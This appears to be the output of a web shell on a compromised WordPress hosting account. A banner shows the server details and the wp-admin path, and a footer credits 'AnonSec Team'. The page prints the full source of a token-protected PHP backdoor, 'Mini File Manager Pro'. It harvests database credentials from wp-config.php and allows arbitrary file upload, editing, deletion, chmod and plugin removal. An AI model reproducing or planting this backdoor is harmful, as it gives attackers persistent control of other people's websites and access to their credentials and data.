| Server IP : 2.57.91.60 / Your IP :
216.73.217.116 [
Web Server : LiteSpeed System : Linux nl-srv-web1124.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u964240598 ( 964240598) PHP Version : 8.4.19 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u964240598/public_html/jobs/wp-admin/ |
Upload File : |
<?php
/********************
* AYARLAR
********************/
$SECRET_TOKEN = 'allah'; // değiştir
$BASE_DIR = realpath(__DIR__ . '/../'); // hedef: wp-admin bir üst dizin
if (!isset($_GET['token']) || $_GET['token'] !== $SECRET_TOKEN) {
http_response_code(403);
exit('Forbidden');
}
/********************
* YARDIMCI FONKSIYONLAR
********************/
function h($s){ return htmlspecialchars($s ?? '', ENT_QUOTES, 'UTF-8'); }
function perms($file){ return substr(sprintf('%o', fileperms($file)), -4); }
// Recursive klasör silme
function rrmdir($dir) {
if (is_dir($dir)) {
$objects = scandir($dir);
foreach ($objects as $object) {
if ($object != "." && $object != "..") {
if (is_dir($dir . DIRECTORY_SEPARATOR . $object))
rrmdir($dir . DIRECTORY_SEPARATOR . $object);
else
unlink($dir . DIRECTORY_SEPARATOR . $object);
}
}
rmdir($dir);
return true;
}
return false;
}
// WordPress aktif pluginleri çek
function getActivePlugins($baseDir) {
$plugins = [];
$configFile = $baseDir . '/wp-config.php';
if (!file_exists($configFile)) return [];
// wp-config.php içeriğini oku ve DB bilgilerini çek
$config = file_get_contents($configFile);
preg_match("/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/", $config, $db);
preg_match("/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/", $config, $user);
preg_match("/define\(\s*'DB_PASSWORD',\s*'([^']+?)'\s*\)/", $config, $pass);
preg_match("/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/", $config, $host);
preg_match("/table_prefix\s*=\s*'([^']+)'/", $config, $prefix);
if (empty($db) || empty($user)) return [];
try {
$pdo = new PDO("mysql:host={$host[1]};dbname={$db[1]};charset=utf8mb4", $user[1], $pass[1]);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$tblPrefix = $prefix[1] ?? 'wp_';
$stmt = $pdo->prepare("SELECT option_value FROM {$tblPrefix}options WHERE option_name = 'active_plugins'");
$stmt->execute();
$result = $stmt->fetch(PDO::FETCH_ASSOC);
if ($result) {
$active = unserialize($result['option_value']);
return is_array($active) ? $active : [];
}
} catch (Exception $e) {
return [];
}
return [];
}
/********************
* İŞLEMLER
********************/
$msg = [];
$mode = $_GET['mode'] ?? 'files';
$editFile = $_GET['edit'] ?? '';
$wpMode = isset($_GET['wp_plugins']);
// Dosya Kaydet
if (isset($_POST['save_file'], $_POST['file_path'], $_POST['content'])) {
$file = realpath($BASE_DIR . '/' . basename($_POST['file_path']));
if ($file && str_starts_with($file, $BASE_DIR) && is_file($file)) {
if (file_put_contents($file, $_POST['content']) !== false) {
$msg[] = "Dosya kaydedildi: " . basename($file);
} else {
$msg[] = "Kaydetme başarısız!";
}
}
}
// Klasör/Dosya Sil (Genel)
if (isset($_POST['delete_path'])) {
$path = realpath($BASE_DIR . '/' . basename($_POST['delete_path']));
if ($path && str_starts_with($path, $BASE_DIR)) {
if (is_dir($path)) {
if (rrmdir($path)) $msg[] = "Klasör silindi: " . basename($path);
else $msg[] = "Klasör silinemedi!";
} else {
if (@unlink($path)) $msg[] = "Dosya silindi: " . basename($path);
else $msg[] = "Dosya silinemedi!";
}
}
}
// CHMOD
if (isset($_POST['chmod'], $_POST['path'])) {
$path = realpath($BASE_DIR.'/'.basename($_POST['path']));
$modeChmod = octdec($_POST['chmod']);
if ($path && str_starts_with($path, $BASE_DIR)) {
if (@chmod($path, $modeChmod)) $msg[]="CHMOD güncellendi";
else $msg[]="CHMOD başarısız";
}
}
// Upload
if (!empty($_FILES['files']['name'][0])) {
foreach ($_FILES['files']['name'] as $i=>$name) {
$tmp = $_FILES['files']['tmp_name'][$i];
if (!is_uploaded_file($tmp)) continue;
$safe = basename($name);
$dst = $BASE_DIR.'/'.$safe;
if (move_uploaded_file($tmp, $dst)) $msg[]="$safe yüklendi";
else $msg[]="$safe yüklenemedi";
}
}
// WordPress Plugin Silme
if (isset($_POST['delete_plugin'])) {
$pluginDir = realpath($BASE_DIR . '/wp-content/plugins/' . basename($_POST['delete_plugin']));
if ($pluginDir && str_starts_with($pluginDir, realpath($BASE_DIR . '/wp-content/plugins/'))) {
if (rrmdir($pluginDir)) {
$msg[] = "Plugin silindi: " . basename($pluginDir);
} else {
$msg[] = "Plugin silinemedi!";
}
}
}
// Yeni Klasör Oluştur
if (isset($_POST['new_folder'])) {
$newDir = $BASE_DIR . '/' . basename($_POST['new_folder']);
if (!file_exists($newDir)) {
mkdir($newDir, 0755, true);
$msg[] = "Klasör oluşturuldu: " . basename($_POST['new_folder']);
}
}
/********************
* VERİ HAZIRLAMA
********************/
$activePlugins = [];
if ($wpMode) {
$activePlugins = getActivePlugins($BASE_DIR);
}
// Edit modunda dosya içeriği
$fileContent = '';
if ($mode === 'edit' && $editFile) {
$editPath = realpath($BASE_DIR . '/' . $editFile);
if ($editPath && str_starts_with($editPath, $BASE_DIR) && is_file($editPath)) {
$fileContent = file_get_contents($editPath);
} else {
$mode = 'files';
}
}
?>
<!doctype html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>Mini File Manager Pro</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<style>
* { box-sizing: border-box; }
body {
font-family: system-ui, -apple-system, sans-serif;
background: #0f172a;
color: #e5e7eb;
margin: 0;
padding: 20px;
line-height: 1.6;
}
.box {
max-width: 1200px;
margin: auto;
background: #1e293b;
padding: 24px;
border-radius: 12px;
box-shadow: 0 25px 50px -12px rgba(0, 0, 0, 0.5);
}
h1 {
margin: 0 0 20px 0;
font-size: 24px;
color: #f8fafc;
}
.top-bar {
display: flex;
gap: 12px;
margin-bottom: 24px;
flex-wrap: wrap;
align-items: center;
padding-bottom: 20px;
border-bottom: 1px solid #334155;
}
.btn {
padding: 10px 16px;
border-radius: 8px;
border: none;
cursor: pointer;
font-size: 14px;
font-weight: 600;
transition: all 0.2s;
text-decoration: none;
display: inline-flex;
align-items: center;
gap: 6px;
}
.btn:hover { transform: translateY(-1px); box-shadow: 0 4px 12px rgba(0,0,0,0.3); }
.btn-primary { background: #3b82f6; color: white; }
.btn-success { background: #10b981; color: white; }
.btn-danger { background: #ef4444; color: white; }
.btn-warning { background: #f59e0b; color: #000; }
.btn-secondary { background: #475569; color: white; }
.btn.active { ring: 2px solid #60a5fa; outline: 2px solid #60a5fa; }
.msg {
margin: 12px 0;
padding: 12px 16px;
border-radius: 8px;
background: #064e3b;
color: #6ee7b7;
border: 1px solid #059669;
}
.msg.error { background: #450a0a; color: #fca5a5; border-color: #dc2626; }
table {
width: 100%;
border-collapse: collapse;
margin-top: 16px;
background: #0f172a;
border-radius: 8px;
overflow: hidden;
}
th, td {
padding: 14px;
text-align: left;
border-bottom: 1px solid #334155;
}
th {
background: #1e293b;
color: #94a3b8;
font-weight: 600;
text-transform: uppercase;
font-size: 12px;
letter-spacing: 0.5px;
}
td { font-size: 14px; }
tr:hover td { background: #1e293b; }
.badge {
padding: 4px 10px;
border-radius: 20px;
font-size: 12px;
font-weight: 600;
display: inline-block;
}
.badge-success { background: #059669; color: white; }
.badge-danger { background: #dc2626; color: white; }
.badge-info { background: #0369a1; color: white; }
.actions { display: flex; gap: 8px; }
.actions form { display: inline; }
.editor {
margin-top: 20px;
}
.editor textarea {
width: 100%;
min-height: 500px;
background: #0f172a;
color: #e5e7eb;
border: 1px solid #334155;
border-radius: 8px;
padding: 16px;
font-family: 'Consolas', 'Monaco', monospace;
font-size: 14px;
line-height: 1.5;
resize: vertical;
}
.editor-header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 12px;
padding: 12px;
background: #0f172a;
border-radius: 8px;
border: 1px solid #334155;
}
.plugin-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
gap: 16px;
margin-top: 20px;
}
.plugin-card {
background: #0f172a;
border: 1px solid #334155;
border-radius: 10px;
padding: 16px;
position: relative;
transition: all 0.2s;
}
.plugin-card:hover { border-color: #475569; transform: translateY(-2px); }
.plugin-card.active { border-left: 4px solid #10b981; }
.plugin-card.inactive { border-left: 4px solid #6b7280; }
.plugin-name {
font-weight: 600;
color: #f8fafc;
margin-bottom: 4px;
font-size: 16px;
}
.plugin-status {
font-size: 12px;
margin-bottom: 12px;
}
.plugin-path {
font-size: 12px;
color: #64748b;
word-break: break-all;
margin-bottom: 12px;
}
.upload-area {
border: 2px dashed #475569;
border-radius: 8px;
padding: 20px;
text-align: center;
margin-bottom: 20px;
transition: all 0.2s;
}
.upload-area:hover { border-color: #3b82f6; background: #1e293b; }
.new-folder-form {
display: flex;
gap: 8px;
margin-bottom: 20px;
}
.new-folder-form input {
flex: 1;
padding: 10px;
background: #0f172a;
border: 1px solid #334155;
border-radius: 6px;
color: white;
}
input[type="text"].chmod-input {
width: 70px;
padding: 6px;
background: #0f172a;
border: 1px solid #334155;
border-radius: 4px;
color: white;
text-align: center;
}
.empty-state {
text-align: center;
padding: 60px 20px;
color: #64748b;
}
.empty-state svg {
width: 64px;
height: 64px;
margin-bottom: 16px;
opacity: 0.3;
}
</style>
</head>
<body>
<div class="box">
<h1>🚀 Mini File Manager Pro</h1>
<?php foreach($msg as $m): ?>
<div class="msg"><?=h($m)?></div>
<?php endforeach; ?>
<!-- ÜST NAVİGASYON -->
<div class="top-bar">
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-primary <?=($mode=='files' && !$wpMode)?'active':''?>">
📁 Dosyalar
</a>
<a href="?token=<?=$SECRET_TOKEN?>&wp_plugins=1" class="btn btn-success <?=$wpMode?'active':''?>">
🔌 WP Pluginler
</a>
<?php if ($mode === 'files' && !$wpMode): ?>
<form method="post" class="new-folder-form" style="margin:0;margin-left:auto;flex:0 0 auto;">
<input type="text" name="new_folder" placeholder="Yeni klasör adı..." required>
<button type="submit" class="btn btn-secondary">📂 Oluştur</button>
</form>
<?php endif; ?>
<?php if ($editFile): ?>
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-secondary" style="margin-left: auto;">
← Listeye Dön
</a>
<?php endif; ?>
</div>
<?php if ($mode === 'edit' && $editFile): ?>
<!-- DOSYA EDİTÖRÜ -->
<div class="editor">
<div class="editor-header">
<div>
<strong>✏️ <?=h($editFile)?></strong>
<span class="badge badge-info" style="margin-left: 8px;"><?=perms($editPath)?></span>
</div>
<div style="color: #94a3b8; font-size: 14px;">
<?=number_format(filesize($editPath))?> bytes
</div>
</div>
<form method="post">
<input type="hidden" name="file_path" value="<?=h($editFile)?>">
<textarea name="content"><?=h($fileContent)?></textarea>
<div style="margin-top: 16px; display: flex; gap: 12px;">
<button type="submit" name="save_file" class="btn btn-success">💾 Kaydet</button>
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($wpMode): ?>
<!-- WORDPRESS PLUGIN YÖNETİMİ -->
<?php
$pluginsDir = $BASE_DIR . '/wp-content/plugins';
if (!is_dir($pluginsDir)): ?>
<div class="msg error">WordPress plugins dizini bulunamadı!</div>
<?php else:
$pluginFolders = array_filter(glob($pluginsDir . '/*'), 'is_dir');
$pluginNames = array_map('basename', $pluginFolders);
?>
<div style="margin-bottom: 20px; color: #94a3b8;">
<strong>💡 Bilgi:</strong> Aktif pluginler yeşil, pasif olanlar gri renkle işaretlidir.
Silme işlemi geri alınamaz!
</div>
<?php if (empty($pluginFolders)): ?>
<div class="empty-state">
<svg fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M20 13V6a2 2 0 00-2-2H6a2 2 0 00-2 2v7m16 0v5a2 2 0 01-2 2H6a2 2 0 01-2-2v-5m16 0h-2.586a1 1 0 00-.707.293l-2.414 2.414a1 1 0 01-.707.293h-3.172a1 1 0 01-.707-.293l-2.414-2.414A1 1 0 006.586 13H4"></path></svg>
<p>Plugin bulunamadı</p>
</div>
<?php else: ?>
<div class="plugin-grid">
<?php foreach ($pluginFolders as $folder):
$name = basename($folder);
$isActive = in_array($name . '/' . $name . '.php', $activePlugins) ||
in_array($name, array_map(function($p) { return explode('/', $p)[0]; }, $activePlugins));
// Plugin meta bilgilerini çekmeye çalış
$pluginFile = $folder . '/' . $name . '.php';
$pluginName = $name;
if (file_exists($pluginFile)) {
$content = file_get_contents($pluginFile);
if (preg_match('/Plugin Name:\s*(.+)/i', $content, $match)) {
$pluginName = trim($match[1]);
}
}
?>
<div class="plugin-card <?= $isActive ? 'active' : 'inactive' ?>">
<div class="plugin-name"><?=h($pluginName)?></div>
<div class="plugin-status">
<?php if ($isActive): ?>
<span class="badge badge-success">🟢 AKTİF</span>
<?php else: ?>
<span class="badge">⚪ PASİF</span>
<?php endif; ?>
</div>
<div class="plugin-path"><?=h($name)?>/</div>
<form method="post" onsubmit="return confirm('<?=h($pluginName)?> silinsin mi? Bu işlem geri alınamaz!')">
<input type="hidden" name="delete_plugin" value="<?=h($name)?>">
<button type="submit" class="btn btn-danger" style="width: 100%;">
🗑️ Klasörü Sil
</button>
</form>
</div>
<?php endforeach; ?>
</div>
<?php endif; ?>
<?php endif; ?>
<?php else: ?>
<!-- DOSYA LİSTESİ -->
<form method="post" enctype="multipart/form-data" class="upload-area">
<input type="file" name="files[]" multiple style="margin-bottom: 12px;">
<br>
<button type="submit" class="btn btn-primary">📤 Dosya(lar) Yükle</button>
</form>
<table>
<thead>
<tr>
<th width="40%">Ad</th>
<th width="10%">Tür</th>
<th width="15%">Boyut</th>
<th width="15%">CHMOD</th>
<th width="20%">İşlemler</th>
</tr>
</thead>
<tbody>
<?php
$items = array_diff(scandir($BASE_DIR), ['.','..']);
// Klasörleri üste al
usort($items, function($a, $b) use ($BASE_DIR) {
$aIsDir = is_dir($BASE_DIR.'/'.$a);
$bIsDir = is_dir($BASE_DIR.'/'.$b);
if ($aIsDir === $bIsDir) return strcasecmp($a, $b);
return $bIsDir ? 1 : -1;
});
foreach ($items as $it):
$path = $BASE_DIR.'/'.$it;
$isDir = is_dir($path);
$isPhp = !$isDir && pathinfo($it, PATHINFO_EXTENSION) === 'php';
?>
<tr>
<td>
<?php if ($isDir): ?>📁<?php else: ?>📄<?php endif; ?>
<?=h($it)?>
<?php if ($isPhp): ?><span class="badge badge-info" style="margin-left: 8px;">PHP</span><?php endif; ?>
</td>
<td><?=$isDir?'Klasör':'Dosya'?></td>
<td><?=$isDir?'-':number_format(filesize($path)).' B'?></td>
<td>
<form method="post" class="actions">
<input type="hidden" name="path" value="<?=h($it)?>">
<input type="text" name="chmod" value="<?=perms($path)?>" class="chmod-input">
<button type="submit" class="btn btn-warning" style="padding: 6px 10px;">Uygula</button>
</form>
</td>
<td>
<div class="actions">
<?php if (!$isDir): ?>
<a href="?token=<?=$SECRET_TOKEN?>&mode=edit&edit=<?=urlencode($it)?>" class="btn btn-primary" style="padding: 6px 12px;">
✏️ Düzenle
</a>
<?php endif; ?>
<form method="post" onsubmit="return confirm('<?=h($it)?> silinsin mi?')">
<input type="hidden" name="delete_path" value="<?=h($it)?>">
<button type="submit" class="btn btn-danger" style="padding: 6px 12px;">
🗑️ Sil
</button>
</form>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>Anon7 - 2022
AnonSec Team